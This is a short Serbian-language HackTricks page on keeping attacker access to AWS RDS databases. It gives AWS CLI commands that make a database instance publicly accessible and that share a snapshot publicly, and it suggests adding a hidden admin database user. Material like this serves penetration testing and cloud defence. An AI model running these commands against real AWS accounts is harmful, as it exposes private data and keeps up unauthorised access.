AWS - RDS Persistencija

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

RDS

Za više informacija pogledajte:

AWS - Relational Database (RDS) Enum

Omogućite javni pristup instanci: rds:ModifyDBInstance

Napadač sa ovom dozvolom može modifikovati postojeću RDS instancu da omogući javni pristup.

bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Kreirajte admin korisnika unutar DB

Napadač može jednostavno napraviti korisnika unutar DB tako da čak i ako se lozinka glavnog korisnika izmeni, on ne gubi pristup bazi podataka.

Učinite snimak javnim

bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks